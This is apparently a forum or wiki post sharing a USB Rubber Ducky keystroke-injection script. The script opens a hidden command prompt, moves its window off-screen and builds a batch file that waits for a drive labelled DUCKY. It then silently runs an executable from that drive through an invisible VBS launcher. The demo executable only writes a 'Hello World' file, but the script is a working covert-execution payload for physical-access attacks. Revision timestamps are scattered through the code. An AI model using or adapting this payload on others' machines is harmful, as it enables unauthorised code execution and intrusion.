2013-06-25 01:17:59 +02:00
The following is a payload I have been working on that waits until a drive labeled "DUCKY" is mounted. I have used some of midnightsnake's code in this payload. The name of the file that is run can be changed to .exe, I am just having it run a batch for testing purposes. The line that says "STRING START %myd%\myEXE.bat" is the line that executes the executable.
2013-02-08 02:09:29 +01:00
2013-02-08 02:10:03 +01:00
```
2013-02-08 02:09:29 +01:00
REM Author: overwraith
REM Name: RunEXE.txt
REM Purpose: Run an executable file off of the SD card after it mounts.
2013-06-25 01:16:22 +02:00
REM Encoder V2.4
REM Using the run command for a broader OS base.
DEFAULT_DELAY 25
DELAY 3000
2013-02-08 02:09:29 +01:00
GUI R
2013-06-25 01:16:22 +02:00
DELAY 1000
2013-02-08 02:09:29 +01:00
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
DELAY 500
ENTER
DELAY 750
ALT SPACE
STRING M
DOWNARROW
REPEAT 100
ENTER
2013-06-25 01:16:22 +02:00
2013-06-26 22:42:16 +02:00
REM Change directories because System32 appears to be protected.
STRING CD %TEMP%
ENTER
2013-02-08 02:09:29 +01:00
REM Make batch file that waits for SD card to mount.
REM Delete batch file if already exists
STRING erase /Q DuckyWait.bat
ENTER
STRING copy con DuckyWait.bat
ENTER
REM DuckyWait.bat
STRING :while1
ENTER
2013-06-25 01:16:22 +02:00
STRING for /f %%d in ('wmic volume get driveletter^, label ^| findstr "DUCKY"')
do set myd=%%d
2013-02-08 02:09:29 +01:00
ENTER
STRING if Exist %myd% (
ENTER
2013-06-29 17:16:40 +02:00
STRING goto :break
2013-02-08 02:09:29 +01:00
ENTER
STRING )
ENTER
STRING timeout /t 30
ENTER
2013-06-29 17:16:40 +02:00
STRING goto :while1
2013-02-08 02:09:29 +01:00
ENTER
STRING :break
ENTER
REM Continue script.
2013-06-25 01:16:22 +02:00
STRING START %myd%\HelloWorld.exe
2013-02-08 02:09:29 +01:00
ENTER
CONTROL z
ENTER
2013-06-25 01:16:22 +02:00
2013-02-08 02:09:29 +01:00
REM MAKE THE VBS FILE THAT ALLOWS RUNNING INVISIBLY.
REM Delete vbs file if already exists
STRING erase /Q invis.vbs
ENTER
2013-06-25 18:13:28 +02:00
REM FROM: http://stackoverflow.com/questions/289498/running-batch-file-in-background-when-windows-boots-up
2013-02-08 02:09:29 +01:00
STRING copy con invis.vbs
ENTER
2013-06-25 18:13:28 +02:00
STRING CreateObject("Wscript.Shell").Run """" & WScript.Arguments(0) & """", 0, False
2013-02-08 02:09:29 +01:00
ENTER
CONTROL Z
ENTER
2013-06-25 01:16:22 +02:00
2013-02-08 02:09:29 +01:00
REM RUN THE BATCH FILE
STRING wscript.exe invis.vbs DuckyWait.bat
ENTER
STRING EXIT
ENTER
2013-02-08 02:10:03 +01:00
```
2013-02-08 02:09:29 +01:00
The following is the batch file that is run after the "DUCKY" drive has been mounted. Everything is being run invisibly, so you will need to check for the existence of "Message.txt" which will probably be in "C:\Windows\system32".
2013-02-08 02:10:03 +01:00
```
2013-02-08 02:09:29 +01:00
REM Message.txt
echo Hello Wolrd!!!
echo Hello World!!! > Message.txt
2013-02-08 02:10:03 +01:00
```
2013-02-08 02:09:29 +01:00
2013-06-25 01:19:33 +02:00
The encoders now support the repeat command, so should only be a problem if you are using an old encoder. Encoders also now support white space in the duck script, so functions have been separated with white space.
2013-06-24 22:16:20 +02:00